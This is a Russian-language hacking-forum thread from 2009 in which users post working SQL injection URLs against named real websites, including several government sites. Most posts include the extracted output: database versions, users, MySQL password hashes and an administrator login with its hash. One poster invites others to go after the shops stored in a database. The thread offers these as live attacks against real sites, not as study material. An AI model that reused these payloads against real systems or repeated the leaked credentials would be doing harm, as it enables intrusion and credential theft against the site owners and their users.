ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8041  
Старый 27.02.2009, 10:11
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

boiteaoutils.cidem.org PageRank - 6
PHP код:
http://boiteaoutils.cidem.org/produits.php?theme=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6+--+ 
4.0.25-standard-log:cidemoutils@10.0.62.118:cidemoutils

www.turbazar.ru - PageRank - 5 ТиЦ -300 вывод в титле

PHP код:
http://www.turbazar.ru/index.php?s=3&c=12&m=46&id_hotel=29+union+select+1,2,concat_ws(0x3A,@@version,user(),database())+--+ 
Версия : 5.0.67
Юзер : grandtour@194.87.13.136
База : grandtour

PHP код:
http://www.turbazar.ru/index.php?s=3&c=12&m=46&id_hotel=29+union+select+1,2,concat_ws(0x3A,user,password,host,file_priv,user())+from+mysql.user+--+ 
grandtour:*F28B6D83F6F364EE8B7B69BE4113813DF72EAD9 6:80.84.119.24:Y:grandtour@194.87.13.136

В базе есть пару шопов , ну дальше сами.

Последний раз редактировалось AkyHa_MaTaTa; 27.02.2009 в 11:39..
 
Ответить с цитированием

  #8042  
Старый 27.02.2009, 12:11
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

http://hembar.ru//index.php?option=com_assortment&task=view&id=1{sql inj}

Database Version: 5.0.45-log
Database name: hembar
User name: root@localhost

!!!FILE_PRIV=YES!!!
 
Ответить с цитированием

  #8043  
Старый 27.02.2009, 12:54
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

Санкт-Петербургский Английский клуб

Цитата:
http://www.spbak.ru/members?-16+union+select+1,user(),database(),version(),5,6, 7,8/*
User: engclub9_akdb@v15.va
Database: engclub9_akdb
Version: 4.0.27-max-log
 
Ответить с цитированием

  #8044  
Старый 27.02.2009, 14:24
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

gov:
Код:
http://www.fo1.dswd.gov.ph/articledetails.php?id=-273+union+select+1,2,concat(user,0x3a,password),4,5,6+FROM+mysql.user

http://www.shandongbusiness.gov.cn/public/zhuanti/kxfzg/index_ok2.php?id=-33+union+select+1,concat(user,0x3a,password),3,4,5,6+FROM+mysql.user

http://support.aide.gov.tw/sub_page_index.php?c_id=35&c_parentid=22&c_rootid=-5+union+select+1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14+from+mysql.user
И:

Код:
http://web272.login-1.hoststar.at/mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users

http://www.tsv-kelbachgrund.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://mobefree.ru/wap/wapmain.php?option=news&action=link&id=-19141+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.toalgenclik.com/wap/wapmain.php?option=onews&action=cat&id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.mazdaeff.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.taxibalk.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mos_users+limit+0,1--

http://gozopolitan.org/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.abilieve2005.de/mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users

Последний раз редактировалось jokester; 27.02.2009 в 15:48.. Причина: dswd.gov.ph и riocuarto.gov.ar БОЯНы
 
Ответить с цитированием

  #8045  
Старый 27.02.2009, 17:28
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://community.realitytvworld.com/gallery/showgallery.php?cat=-1+union+select+1,concat(0x3a3a,concat_ws(0x3a3a,us ername,password,icq,email)),3+from+ppusers+limit+0 ,1--

login: Admin
pass:02b2ea2e07bf23853ee3b1c3798b5b0c(не подбрутился)

буржуйская куйня. ипическое количество юзеров
 
Ответить с цитированием

  #8046  
Старый 27.02.2009, 18:04
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Pagerank: 5
тИЦ: 1200


Код:
http://www.etver.ru/lenta/index.php?newsid=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9--
Database Version : 4.1.25-log
Database name : etver
User name : etver@localhost


----------------------------------------#

Pagerank: 4
тИЦ: 700


Код:
http://www.horseworld.ru/?news=-1+union+select+1,2,concat _ws(0x 3a,version(),database(),user()),4,5,6--
Database Version : 5.1.22-rc
Database name : horseworld
User name : horseworld1@89.111.191.34

Последний раз редактировалось f1ng3r; 27.02.2009 в 20:10.. Причина: add
 
Ответить с цитированием

  #8047  
Старый 27.02.2009, 19:59
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+ version() ),1,1))>x--

x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121

http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+ database() ),1,1))>x--

x=104,101,108,108,111,107,105,100,115

http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+ user() ),1,1))>x--

x=104,101,108,108,111,107,105,100,115,64,108,111,9 9,97,108,104,111,115,116


Version : 5.0.67-community
Database: hellokids
User : hellokids@localhost
 
Ответить с цитированием

  #8048  
Старый 27.02.2009, 20:10
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.aromat.ru PageRank - 5 ТиЦ - 450 (вывод в титле)
PHP код:
http://www.aromat.ru/parfum/women_type.php3?tip=-3+union+select+concat_ws(0x3A,user(),@@version,database())+--+ 
user() - aromat@192.168.26.101
@@version - 5.0.60-log
database() - aromat
 
Ответить с цитированием

  #8049  
Старый 27.02.2009, 22:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.reporterspecialdearges.ro/_articol/Singuratate-liberala-intr-un-judet-controlat-de-PSD-/1998/2+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0 x3a,Version(),Database(),User()),0x71),0x71),2,3,4 ,5,6,7,8,9,10,11,12--/



Database Version: 4.1.21-standard-log
Database name: softpage_arges
User name: softpage_erkro@localhost
 
Ответить с цитированием

  #8050  
Старый 27.02.2009, 22:18
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Mission Cataract USA
Код:
http://www.missioncataractusa.org/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(version(),user(),database()),3,4,5--
версия/юзер/бд:

Код:
missionc_user@localhost4.1.22-standard-logmissionc_cms
-----------------------------------------------------------
The End!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ